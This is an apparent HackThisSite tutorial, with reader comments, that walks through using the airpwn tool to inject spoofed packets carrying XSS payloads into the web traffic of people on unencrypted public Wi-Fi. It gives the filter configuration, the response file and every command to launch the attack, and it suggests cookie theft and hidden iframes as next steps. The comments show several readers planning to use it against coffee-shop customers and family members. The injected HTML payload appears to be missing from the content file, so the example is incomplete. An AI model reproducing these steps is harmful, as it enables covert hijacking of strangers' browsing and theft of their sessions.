If I asked how many of you have ever used a public hotspot, whether at the airport, a coffee shop, a store, or anywhere else, the vast majority of you would probably answer yes. Of course, we all know how unsafe these public wireless networks can be; so we know better than to read our email, enter our passwords, or give out any sensitive information. However, many people (even the most informed) still believe that casual surfing of the net on a public network is perfectly fine. Usually, they would respond with:
“If I’m not looking at something private, who cares if someone’s watching?”
The reality is that packet sniffing is no longer the only threat to public network users, packing injection tools like airpwn can make even casual browsing incredibly dangerous.
In this article, I will show you how airpwn can generate spoofed packets containing XSS payloads and what you could potentially do with them. Hopefully, this article will give you some insight on the huge dangers of using unencrypted public hotspots and will convince you to try and avoid them.
Disclaimer
I wrote this article purely as an education illustration of what airpwn can do to users of an unencrypted public wireless network. Neither I, nor HackThisSite, shall be held responsible for any damages you cause based on the information in this article.
How Airpwn Works
Airpwn is a packet injection tool that monitors 802.11a/b/g networks and scans for outgoing request packets from a victim’s computer. It uses a regex-based configurable filtering engine to find ‘matching’ request packets. Once it locates ‘matching’ request packets, airpwn can inject spoofed reply packets back to the victim’s computer carrying the correct IP address and MAC address of the requested resource as well as any specified payload. Since the attacker’s spoofed packets arrive faster than the packets from the requested resource (airpwn can respond in less than 1ms, average internet latency is about 50ms), the victim’s computer will accept the injected packets and treat them as valid. When the real packets from the requested resource finally arrive, they will either by dropped (if the requested packet is shorter than the spoofed) or appended to the spoofed packets (if the requested packet is longer than the spoofed).
With that said, the attacker could easily inject replacement pictures, HTML, client side scripting languages like Javascript, or any other XSS payload into the forged packets. This is where XSS and wireless network attacks cross paths, and as a result, XSS is given an entirely new meaning; each and every website visited suddenly becomes XSS vulnerable.
Backtrack 2
Backtrack 2 is an excellent Slackware LiveCD that comes bundled with a variety of useful tools and software for security and penetration testing. Airpwn, the packet injection tool we will be using, is included on this LiveCD. You can get Backtrack 2 from http://www.remote-exploit.com. Once you have downloaded it, burn the Backtrack 2 image to a CD and boot from it. Depending on your computer, you may have to change your boot order. Once the LiveCD boots, you can use the username root and the password toor to login.
The Attack
1. Go to the root directory of the airpwn program. On Backtrack 2, you can do this by running the command: cd /pentest/wireless/airpwn-*
2. Go the configuration directory by running: cd conf
3. Start up your favourite text editor (I prefer nano) and create a new file named xss_attack. In this file, type:
CODE :
begin xss_attack
match ^(GET|POST)
ignore ^GET [^ ?]+.(jpg|jpeg|gif|png|tiff|tif)
response content/xss_content
This is the configuration we will specify for airpwn’s internal filtering engine. The second line is a regular expression for the packets that will be accepted by airpwn. The third line is another regular expression for the packets that will be ignored by airpwn. The last line specifies the content file that will be injected into each spoofed packet.
4. Go back to the root directory of the airpwn program by running: cd ..
5. Go to the content folder by running: cd content
6. Start up your favourite text editor again and create another new file named xss_content. In this file, type:
CODE :
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
This file specifies the content that will be injected into each spoofed packet. It contains the headers that would have been sent back by a web server and the HTML to inject. In the above example, each page visited by the victim would result in a Javascript alert and the rest of the code (if appended from the real packet) being commented out.
7. Go back to the root directory of the airpwn program by running: cd ..
8. Run: ./madwifing_prep.sh to set up your 802.11a/b/g wireless network card.
9. Find the name of your wireless interface by running: iwconfig
10. Set the channel of your wireless card to the channel of the target wireless network. For example, if my wireless interface was ath0 and the channel of my target wireless network was 13, I would run: iwconfig ath0 channel 13
11. Enable your wireless interface by running: ifconfig ath0 up
12. Finally, start up airpwn by running: airpwn –c conf/xss_attack –i ath0 –d madwifi –vvv
The –c flag specifies the configuration file, the –i flag specifies the wireless interface, the –d flag specifies the driver (which should be madwifi if you used the madwifing_prep shell script), and the –vvv flag specifies verbosity.
Potential Attacks
Once you can successfully inject arbitrary content to your target wireless networks, your capabilities become endless. You could insert invisible/visible IFRAMEs, cookie stealing code, history scanners, or ANY other XSS code you wish.
“With airpwn, you *are* the network…You are every web server out there” – Source: Airpwn Readme
Preventing These Attacks
The only real way to prevent against this type of attacks is to avoid unencrypted public wireless networks! If you absolutely must use a public network, ensure that ALL HTTP traffic goes over an encrypted tunnel (e.g. VPN, encrypted proxies).
Happy Hacking!
Cast your vote on this article *Note: the order of the votes has been reversed.
Great article, just one thing I want to add. For HTML responses you said to use an opening comment brace at the end in case the actual response is appended. The problem with this is that some browsers (such as IE) will use the first \"-->\" to end a comment, even if it is for another comment. Example:
<!-- This is a comment <!-- and so is this --> This is a comment in FF, but not IE --> This isn\'t a comment.
A better solution would probably be to end with <div style=\"visability: hidden\">, or something similar.
Thanks vh04x for the article ive been reading it on and off during the day im downloading the backtrack 2 and going to burn it to a cd. Ive learned quite a bit, been googling and on wikipedia so thanks alot for the knowledge. 10/10 from me
I love experimenting with my wireless on my laptop, I have a .txt file containing the WEPs of all my local wifi spots, aircrack-ptw is extremely handy when used with aircrack-ng, so I will be experimenting with this and will try out a few things on my mother while she is on the computer downstairs :D
This is absolutely lethal. O_O
Airpwn also supports WEP too, so you could crack a WEP key with aircrack and also do something similar on a \"secure\" network where people are even more likely to input sensitive data.
Now the only way to be safe is to change the SSID, never broadcast the SSID, use WPA, and set up MAC address filtering. :P
Sweet! I so want to try this at the new coffee shop in my neighborhood. I can just see customer\'s reaction when every page they visit displays scrolling text with the words: \"j00 g0t 0wn3d!\". You gotta love XSS. :)
Borders will never be the same again. Thank you for the read, 10/10.
This site is the collective work of the
HackThisSite staff. Please don't reproduce in part or whole without permission.
Page Generated: Wed, 03 Dec 2008 20:15:23 -0500 Exec:
10 Page loaded in 0.16072 seconds!
I enjoyed this and was happy to accept it :)